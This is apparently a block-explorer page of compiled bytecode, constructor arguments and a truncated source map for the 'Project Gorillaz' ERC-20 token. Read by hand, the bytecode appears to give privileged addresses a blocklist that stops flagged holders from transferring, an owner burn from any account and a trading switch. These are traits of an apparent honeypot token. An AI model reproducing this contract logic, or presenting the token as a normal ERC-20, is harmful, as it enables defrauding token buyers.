2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516113379190611826565b60405180910390a3505b5b61139e565b60011515600860009054906101000a900460ff1615151461139d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161139490611ff5565b60405180910390fd5b5b6113a9838383611643565b505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156114e2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114d990612119565b60405180910390fd5b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015611569576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611560906121ab565b60405180910390fd5b8160095461157791906121cb565b600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600460008282546115cc91906121cb565b92505081905550600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516116319190611826565b60405180910390a3505050565b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611682578082015181840152602081019050611667565b83811115611691576000848401525b50505050565b6000601f19601f8301169050919050565b60006116b382611648565b6116bd8185611653565b93506116cd818560208601611664565b6116d681611697565b840191505092915050565b600060208201905081810360008301526116fb81846116a8565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006117388261170d565b9050919050565b6117488161172d565b811461175357600080fd5b50565b6000813590506117658161173f565b92915050565b6000819050919050565b61177e8161176b565b811461178957600080fd5b50565b60008135905061179b81611775565b92915050565b600080604083850312156117b8576117b7611703565b5b60006117c685828601611756565b92505060206117d78582860161178c565b9150509250929050565b60008115159050919050565b6117f6816117e1565b82525050565b600060208201905061181160008301846117ed565b92915050565b6118208161176b565b82525050565b600060208201905061183b6000830184611817565b92915050565b60008060006060848603121561185a57611859611703565b5b600061186886828701611756565b935050602061187986828701611756565b925050604061188a8682870161178c565b9150509250925092565b600060ff82169050919050565b6118aa81611894565b82525050565b60006020820190506118c560008301846118a1565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126118f0576118ef6118cb565b5b8235905067ffffffffffffffff81111561190d5761190c6118d0565b5b602083019150836020820283011115611929576119286118d5565b5b9250929050565b611939816117e1565b811461194457600080fd5b50565b60008135905061195681611930565b92915050565b60008060006040848603121561197557611974611703565b5b600084013567ffffffffffffffff81111561199357611992611708565b5b61199f868287016118da565b935093505060206119b286828701611947565b9150509250925092565b6000602082840312156119d2576119d1611703565b5b60006119e084828501611756565b91505092915050565b6119f28161172d565b82525050565b6000602082019050611a0d60008301846119e9565b92915050565b60008060408385031215611a2a57611a29611703565b5b6000611a3885828601611756565b9250506020611a4985828601611756565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680611a9a57607f821691505b60208210811415611aae57611aad611a53565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611aee8261176b565b9150611af98361176b565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115611b2e57611b2d611ab4565b5b828201905092915050565b7f43616c6c6572206973206e6f7420666565206469737472696275746f72000000600082015250565b6000611b6f601d83611653565b9150611b7a82611b39565b602082019050919050565b60006020820190508181036000830152611b9e81611b62565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b6000611bdf8261176b565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff821415611c1257611c11611ab4565b5b600182019050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611c53602083611653565b9150611c5e82611c1d565b602082019050919050565b60006020820190508181036000830152611c8281611c46565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611ce5602583611653565b9150611cf082611c89565b604082019050919050565b60006020820190508181036000830152611d1481611cd8565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611d77602483611653565b9150611d8282611d1b565b604082019050919050565b60006020820190508181036000830152611da681611d6a565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611e09602283611653565b9150611e1482611dad565b604082019050919050565b60006020820190508181036000830152611e3881611dfc565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611e75601d83611653565b9150611e8082611e3f565b602082019050919050565b60006020820190508181036000830152611ea481611e68565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611f07602583611653565b9150611f1282611eab565b604082019050919050565b60006020820190508181036000830152611f3681611efa565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611f99602383611653565b9150611fa482611f3d565b604082019050919050565b60006020820190508181036000830152611fc881611f8c565b9050919050565b50565b6000611fdf600083611653565b9150611fea82611fcf565b600082019050919050565b6000602082019050818103600083015261200e81611fd2565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000612071602683611653565b915061207c82612015565b604082019050919050565b600060208201905081810360008301526120a081612064565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b6000612103602183611653565b915061210e826120a7565b604082019050919050565b60006020820190508181036000830152612132816120f6565b9050919050565b7f45524332303a206275726e20616d6f756e7420657863656564732062616c616e60008201527f6365000000000000000000000000000000000000000000000000000000000000602082015250565b6000612195602283611653565b91506121a082612139565b604082019050919050565b600060208201905081810360008301526121c481612188565b9050919050565b60006121d68261176b565b91506121e18361176b565b9250828210156121f4576121f3611ab4565b5b82820390509291505056fea26469706673582212206332846aa4261635e83d014f1fe115bab2da9e3610a8e7f019bf5f71c595880764736f6c634300080a0033000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000000000000000000000000000000000048c273950000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000001050726f6a65637420476f72696c6c617a000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008474f52494c4c415a000000000000000000000000000000000000000000000000
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106101165760003560e01c8063715018a6116100a25780639dc29fac116100715780639dc29fac146102d1578063a457c2d7146102ed578063a9059cbb1461031d578063dd62ed3e1461034d578063e074839e1461037d57610116565b8063715018a6146102815780638da5cb5b1461028b57806391b69fa0146102a957806395d89b41146102b357610116565b8063313ce567116100e9578063313ce567146101b757806339509351146101d55780634b1ca195146102055780634fbee1931461022157806370a082311461025157610116565b806306fdde031461011b578063095ea7b31461013957806318160ddd1461016957806323b872dd14610187575b600080fd5b610123610399565b60405161013091906116e1565b60405180910390f35b610153600480360381019061014e91906117a1565b61042b565b60405161016091906117fc565b60405180910390f35b61017161044e565b60405161017e9190611826565b60405180910390f35b6101a1600480360381019061019c9190611841565b610458565b6040516101ae91906117fc565b60405180910390f35b6101bf610487565b6040516101cc91906118b0565b60405180910390f35b6101ef60048036038101906101ea91906117a1565b610490565b6040516101fc91906117fc565b60405180910390f35b61021f600480360381019061021a919061195c565b61053a565b005b61023b600480360381019061023691906119bc565b61066f565b60405161024891906117fc565b60405180910390f35b61026b600480360381019061026691906119bc565b6106c5565b6040516102789190611826565b60405180910390f35b61028961070e565b005b610293610796565b6040516102a091906119f8565b60405180910390f35b6102b16107bf565b005b6102bb610895565b6040516102c891906116e1565b60405180910390f35b6102eb60048036038101906102e691906117a1565b610927565b005b610307600480360381019061030291906117a1565b6109b1565b60405161031491906117fc565b60405180910390f35b610337600480360381019061033291906117a1565b610a9b565b60405161034491906117fc565b60405180910390f35b61036760048036038101906103629190611a13565b610abe565b6040516103749190611826565b60405180910390f35b610397600480360381019061039291906119bc565b610b45565b005b6060600680546103a890611a82565b80601f01602080910402602001604051908101604052809291908181526020018280546103d490611a82565b80156104215780601f106103f657610100808354040283529160200191610421565b820191906000526020600020905b81548152906001019060200180831161040457829003601f168201915b5050505050905090565b600080610436610c60565b9050610443818585610c68565b600191505092915050565b6000600454905090565b600080610463610c60565b9050610470858285610e33565b61047b858585610ebf565b60019150509392505050565b60006009905090565b60008061049b610c60565b905061052f818585600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461052a9190611ae3565b610c68565b600191505092915050565b3373ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146105ca576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105c190611b85565b60405180910390fd5b60005b838390508110156106695781600a60008686858181106105f0576105ef611ba5565b5b905060200201602081019061060591906119bc565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061066190611bd4565b9150506105cd565b50505050565b6000600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610716610c60565b73ffffffffffffffffffffffffffffffffffffffff16610734610796565b73ffffffffffffffffffffffffffffffffffffffff161461078a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161078190611c69565b60405180910390fd5b61079460006113ae565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6107c7610c60565b73ffffffffffffffffffffffffffffffffffffffff166107e5610796565b73ffffffffffffffffffffffffffffffffffffffff161461083b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161083290611c69565b60405180910390fd5b60001515600860009054906101000a900460ff1615151415610877576001600860006101000a81548160ff021916908315150217905550610893565b6000600860006101000a81548160ff0219169083151502179055505b565b6060600780546108a490611a82565b80601f01602080910402602001604051908101604052809291908181526020018280546108d090611a82565b801561091d5780601f106108f25761010080835404028352916020019161091d565b820191906000526020600020905b81548152906001019060200180831161090057829003601f168201915b5050505050905090565b61092f610c60565b73ffffffffffffffffffffffffffffffffffffffff1661094d610796565b73ffffffffffffffffffffffffffffffffffffffff16146109a3576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161099a90611c69565b60405180910390fd5b6109ad8282611472565b5050565b6000806109bc610c60565b90506000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905083811015610a82576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a7990611cfb565b60405180910390fd5b610a8f8286868403610c68565b60019250505092915050565b600080610aa6610c60565b9050610ab3818585610ebf565b600191505092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610b4d610c60565b73ffffffffffffffffffffffffffffffffffffffff16610b6b610796565b73ffffffffffffffffffffffffffffffffffffffff1614610bc1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bb890611c69565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610c1c57600080fd5b80600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610cd8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ccf90611d8d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610d48576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d3f90611e1f565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610e269190611826565b60405180910390a3505050565b6000610e3f8484610abe565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610eb95781811015610eab576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ea290611e8b565b60405180910390fd5b610eb88484848403610c68565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610f2f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f2690611f1d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610f9f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f9690611faf565b60405180910390fd5b60011515600860009054906101000a900460ff1615151480610ff35750610fc4610796565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16145b806110305750611001610796565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16145b15611347576000600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054111561134257600a60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16156111175760008114611112576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161110990611ff5565b60405180910390fd5b611341565b600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff166111ac57600081116111ab576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111a290611ff5565b60405180910390fd5b5b6111b783838361163e565b6000600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508181101561123e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161123590612087565b60405180910390fd5b818103600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546112d39190611ae3565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516113379190611826565b60405180910390a3505b5b61139e565b60011515600860009054906101000a900460ff1615151461139d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161139490611ff5565b60405180910390fd5b5b6113a9838383611643565b505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156114e2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114d990612119565b60405180910390fd5b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015611569576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611560906121ab565b60405180910390fd5b8160095461157791906121cb565b600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600460008282546115cc91906121cb565b92505081905550600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516116319190611826565b60405180910390a3505050565b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611682578082015181840152602081019050611667565b83811115611691576000848401525b50505050565b6000601f19601f8301169050919050565b60006116b382611648565b6116bd8185611653565b93506116cd818560208601611664565b6116d681611697565b840191505092915050565b600060208201905081810360008301526116fb81846116a8565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006117388261170d565b9050919050565b6117488161172d565b811461175357600080fd5b50565b6000813590506117658161173f565b92915050565b6000819050919050565b61177e8161176b565b811461178957600080fd5b50565b60008135905061179b81611775565b92915050565b600080604083850312156117b8576117b7611703565b5b60006117c685828601611756565b92505060206117d78582860161178c565b9150509250929050565b60008115159050919050565b6117f6816117e1565b82525050565b600060208201905061181160008301846117ed565b92915050565b6118208161176b565b82525050565b600060208201905061183b6000830184611817565b92915050565b60008060006060848603121561185a57611859611703565b5b600061186886828701611756565b935050602061187986828701611756565b925050604061188a8682870161178c565b9150509250925092565b600060ff82169050919050565b6118aa81611894565b82525050565b60006020820190506118c560008301846118a1565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126118f0576118ef6118cb565b5b8235905067ffffffffffffffff81111561190d5761190c6118d0565b5b602083019150836020820283011115611929576119286118d5565b5b9250929050565b611939816117e1565b811461194457600080fd5b50565b60008135905061195681611930565b92915050565b60008060006040848603121561197557611974611703565b5b600084013567ffffffffffffffff81111561199357611992611708565b5b61199f868287016118da565b935093505060206119b286828701611947565b9150509250925092565b6000602082840312156119d2576119d1611703565b5b60006119e084828501611756565b91505092915050565b6119f28161172d565b82525050565b6000602082019050611a0d60008301846119e9565b92915050565b60008060408385031215611a2a57611a29611703565b5b6000611a3885828601611756565b9250506020611a4985828601611756565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680611a9a57607f821691505b60208210811415611aae57611aad611a53565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611aee8261176b565b9150611af98361176b565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115611b2e57611b2d611ab4565b5b828201905092915050565b7f43616c6c6572206973206e6f7420666565206469737472696275746f72000000600082015250565b6000611b6f601d83611653565b9150611b7a82611b39565b602082019050919050565b60006020820190508181036000830152611b9e81611b62565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b6000611bdf8261176b565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff821415611c1257611c11611ab4565b5b600182019050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611c53602083611653565b9150611c5e82611c1d565b602082019050919050565b60006020820190508181036000830152611c8281611c46565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611ce5602583611653565b9150611cf082611c89565b604082019050919050565b60006020820190508181036000830152611d1481611cd8565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611d77602483611653565b9150611d8282611d1b565b604082019050919050565b60006020820190508181036000830152611da681611d6a565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611e09602283611653565b9150611e1482611dad565b604082019050919050565b60006020820190508181036000830152611e3881611dfc565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611e75601d83611653565b9150611e8082611e3f565b602082019050919050565b60006020820190508181036000830152611ea481611e68565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611f07602583611653565b9150611f1282611eab565b604082019050919050565b60006020820190508181036000830152611f3681611efa565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611f99602383611653565b9150611fa482611f3d565b604082019050919050565b60006020820190508181036000830152611fc881611f8c565b9050919050565b50565b6000611fdf600083611653565b9150611fea82611fcf565b600082019050919050565b6000602082019050818103600083015261200e81611fd2565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000612071602683611653565b915061207c82612015565b604082019050919050565b600060208201905081810360008301526120a081612064565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b6000612103602183611653565b915061210e826120a7565b604082019050919050565b60006020820190508181036000830152612132816120f6565b9050919050565b7f45524332303a206275726e20616d6f756e7420657863656564732062616c616e60008201527f6365000000000000000000000000000000000000000000000000000000000000602082015250565b6000612195602283611653565b91506121a082612139565b604082019050919050565b600060208201905081810360008301526121c481612188565b9050919050565b60006121d68261176b565b91506121e18361176b565b9250828210156121f4576121f3611ab4565b5b82820390509291505056fea26469706673582212206332846aa4261635e83d014f1fe115bab2da9e3610a8e7f019bf5f71c595880764736f6c634300080a0033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000000000000000000000000000000000048c273950000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000001050726f6a65637420476f72696c6c617a000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008474f52494c4c415a000000000000000000000000000000000000000000000000
-----Decoded View---------------
Arg [0] : name (string): Project Gorillaz
Arg [1] : symbol (string): GORILLAZ
Arg [2] : totalSupply (uint256): 5000000000000
Arg [3] : initTransfer (bool): True
-----Encoded View---------------
8 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000c0
Arg [2] : 0000000000000000000000000000000000000000000000000000048c27395000
Arg [3] : 0000000000000000000000000000000000000000000000000000000000000001
Arg [4] : 0000000000000000000000000000000000000000000000000000000000000010
Arg [5] : 50726f6a65637420476f72696c6c617a00000000000000000000000000000000
Arg [6] : 0000000000000000000000000000000000000000000000000000000000000008
Arg [7] : 474f52494c4c415a000000000000000000000000000000000000000000000000
Deployed Bytecode Sourcemap
85:348:6:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1538:100:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3888:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2657:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4669:295;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2500:92;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5373:240;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12616:223;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;1329:139;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2828:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1809:103:5;;;:::i;:::-;;720:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1161:160:1;;;:::i;:::-;;1757:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;323:107:6;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;6116:438:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3161:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3417:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1313:145:5;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;1538:100:1;1592:13;1625:5;1618:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1538:100;:::o;3888:201::-;3971:4;3988:13;4004:12;:10;:12::i;:::-;3988:28;;4027:32;4036:5;4043:7;4052:6;4027:8;:32::i;:::-;4077:4;4070:11;;;3888:201;;;;:::o;2657:108::-;2718:7;2745:12;;2738:19;;2657:108;:::o;4669:295::-;4800:4;4817:15;4835:12;:10;:12::i;:::-;4817:30;;4858:38;4874:4;4880:7;4889:6;4858:15;:38::i;:::-;4907:27;4917:4;4923:2;4927:6;4907:9;:27::i;:::-;4952:4;4945:11;;;4669:295;;;;;:::o;2500:92::-;2558:5;2583:1;2576:8;;2500:92;:::o;5373:240::-;5461:4;5478:13;5494:12;:10;:12::i;:::-;5478:28;;5517:66;5526:5;5533:7;5572:10;5542:11;:18;5554:5;5542:18;;;;;;;;;;;;;;;:27;5561:7;5542:27;;;;;;;;;;;;;;;;:40;;;;:::i;:::-;5517:8;:66::i;:::-;5601:4;5594:11;;;5373:240;;;;:::o;12616:223::-;1185:10:5;1169:26;;:12;;;;;;;;;;;:26;;;1161:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;12713:9:1::1;12708:124;12732:8;;:15;;12728:1;:19;12708:124;;;12817:3;12769:32;:45;12802:8;;12811:1;12802:11;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;12769:45;;;;;;;;;;;;;;;;:51;;;;;;;;;;;;;;;;;;12749:3;;;;;:::i;:::-;;;;12708:124;;;;12616:223:::0;;;:::o;1329:139::-;1395:4;1419:32;:41;1452:7;1419:41;;;;;;;;;;;;;;;;;;;;;;;;;1412:48;;1329:139;;;:::o;2828:127::-;2902:7;2929:9;:18;2939:7;2929:18;;;;;;;;;;;;;;;;2922:25;;2828:127;;;:::o;1809:103:5:-;951:12;:10;:12::i;:::-;940:23;;:7;:5;:7::i;:::-;:23;;;932:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;1874:30:::1;1901:1;1874:18;:30::i;:::-;1809:103::o:0;720:87::-;766:7;793:6;;;;;;;;;;;786:13;;720:87;:::o;1161:160:1:-;951:12:5;:10;:12::i;:::-;940:23;;:7;:5;:7::i;:::-;:23;;;932:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;1236:5:1::1;1219:22;;:13;;;;;;;;;;;:22;;;1215:99;;;1269:4;1253:13;;:20;;;;;;;;;;;;;;;;;;1215:99;;;1307:5;1291:13;;:21;;;;;;;;;;;;;;;;;;1215:99;1161:160::o:0;1757:104::-;1813:13;1846:7;1839:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1757:104;:::o;323:107:6:-;951:12:5;:10;:12::i;:::-;940:23;;:7;:5;:7::i;:::-;:23;;;932:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;400:22:6::1;406:7;415:6;400:5;:22::i;:::-;323:107:::0;;:::o;6116:438:1:-;6209:4;6226:13;6242:12;:10;:12::i;:::-;6226:28;;6265:24;6292:11;:18;6304:5;6292:18;;;;;;;;;;;;;;;:27;6311:7;6292:27;;;;;;;;;;;;;;;;6265:54;;6358:15;6338:16;:35;;6330:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;6451:60;6460:5;6467:7;6495:15;6476:16;:34;6451:8;:60::i;:::-;6542:4;6535:11;;;;6116:438;;;;:::o;3161:193::-;3240:4;3257:13;3273:12;:10;:12::i;:::-;3257:28;;3296;3306:5;3313:2;3317:6;3296:9;:28::i;:::-;3342:4;3335:11;;;3161:193;;;;:::o;3417:151::-;3506:7;3533:11;:18;3545:5;3533:18;;;;;;;;;;;;;;;:27;3552:7;3533:27;;;;;;;;;;;;;;;;3526:34;;3417:151;;;;:::o;1313:145:5:-;951:12;:10;:12::i;:::-;940:23;;:7;:5;:7::i;:::-;:23;;;932:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;1414:1:::1;1390:26;;:12;;;;;;;;;;;:26;;;1381:36;;;::::0;::::1;;1443:7;1428:12;;:2